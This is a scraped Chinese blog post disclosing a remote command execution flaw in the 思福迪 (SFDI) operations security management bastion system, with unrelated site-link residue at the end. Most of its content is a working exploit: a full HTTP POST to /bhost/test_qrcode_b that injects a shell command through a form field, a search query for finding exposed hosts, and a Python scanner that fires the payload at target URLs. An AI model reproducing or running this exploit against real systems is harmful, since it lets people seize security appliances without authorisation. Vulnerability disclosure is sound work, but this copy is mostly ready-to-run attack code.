当前位置: 首页 > news >正文

做免费网站对做网站公司的疑问

news 2025/11/14 19:41:57
做免费网站,对做网站公司的疑问,无锡网站建设专家,在阿里云做网站教程思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现1.手动复现2.自动化复现3.python源代码 免责声明#xff1a;请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任… 思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞 一、漏洞描述二、漏洞影响三、网络测绘四、漏洞复现1.手动复现2.自动化复现3.python源代码 免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、漏洞描述 思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。 二、漏洞影响 思福迪 运维安全管理系统 三、网络测绘 app“思福迪-LOGBASE” 四、漏洞复现 登陆页面 1.手动复现 验证POC POST /bhost/test_qrcode_b HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Content-Length: 23 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://xxx.xxx.xxx.xxx Accept-Encoding: gzipz11z2|id;z3bhostburp截图 2.自动化复现 小龙POC检测脚本正式开源请各路大神完善和批评 小龙POCexe传送门: 小龙POC工具 小龙POC开源传送门: 小龙POC工具 3.python源代码 # SFDI_Security_Management_System_test_qrcode_b_Command_Vuln_Scan.pyimport requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests.exceptions import Timeoutdef Scan_SFDI_Security_Management_System_test_qrcode_b_Command_Vuln(url, proxies, headers, append_to_output):proxies {http: http://127.0.0.1:8080,https: http://127.0.0.1:8080}if url.endswith(/):path bhost/test_qrcode_belse:path /bhost/test_qrcode_bif not url.startswith(http://) and not url.startswith(https://):url http:// urlheaders {User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36,Content-Length: 23,Connection: close,Content-Type: application/x-www-form-urlencoded,Referer: url,Accept-Encoding: gzip,}encodetext url pathdataz11z2|id;z3bhostappend_to_output(, green)append_to_output(f扫描目标: {url}, yellow)try:requests.packages.urllib3.disable_warnings(InsecureRequestWarning)req1 requests.post(encodetext, datadata, headersheaders, verifyFalse, timeout20, proxiesproxies)if req1.status_code 200 and uid in req1.text:append_to_output(f[] {url} 存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞, red)else:append_to_output(f[-] {url} 不存在思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞, green)except Timeout:append_to_output(f[!] 请求超时跳过URL: {url}, yellow)except Exception as e:if HTTPSConnectionPool in str(e) or Burp Suite Professional in str(e):append_to_output(f[-] {url} 证书校验错误或者证书被拒绝, yellow)else:append_to_output(str(e), yellow)
http://www.zqtcl.cn/news/583996/

相关文章:

  • 高端网站网站设计网站建设怎么分析市场分析
  • 株洲网站设计外包运营wordpress seo插件教程
  • 做湘菜的网站wordpress外贸网站
  • 可以做书的网站做网站的软件叫什么
  • 深圳营销型网站公司电话网站优化北京如何联系?
  • 网站配资公司网站织梦怎么关闭网站
  • 建设企业网站哪家好网站页面布局设计思路
  • 长尾词在线挖掘数字营销服务商seo
  • cms傻瓜式建站系统帝国 cms 网站关键字
  • 东莞营销网站建设直播php 网站 项目
  • 网站访问量什么意思wordpress 静态商店
  • 汕头建站平台网站如何配置域名
  • 大芬网站建设石嘴山网站建设
  • 彩票网站开发解决方案wordpress网站如何与关联
  • 怎么做各大视频网站的会员代理芜湖的网站建设
  • 番禺做网站开发免费素材下载网站
  • 做网站服务公司王业美
  • 遵义网站建设推广城乡住房建设部官网查询
  • 电商设计网站素材免费建站网站seo
  • 做雕塑网站丹阳网站推广
  • 夏津网站建设公司应用分析网站
  • 长春seo网站优化个人网站要有什么
  • 网站开发流程步骤 口袋青海个人旅游网站建设
  • php企业网站多少钱图书馆网站建设建议
  • 企业网站建设综合实训学习体会个人网站空间申请
  • 企业小型网站要多少钱合肥城乡建设网站首页
  • 济南建站公司注意事项做钓鱼网站要什么工具
  • 网站建设数据录入创建网络公司
  • 行业网站建设报价摄影标志logo设计欣赏
  • 做reference的网站网站首页 模板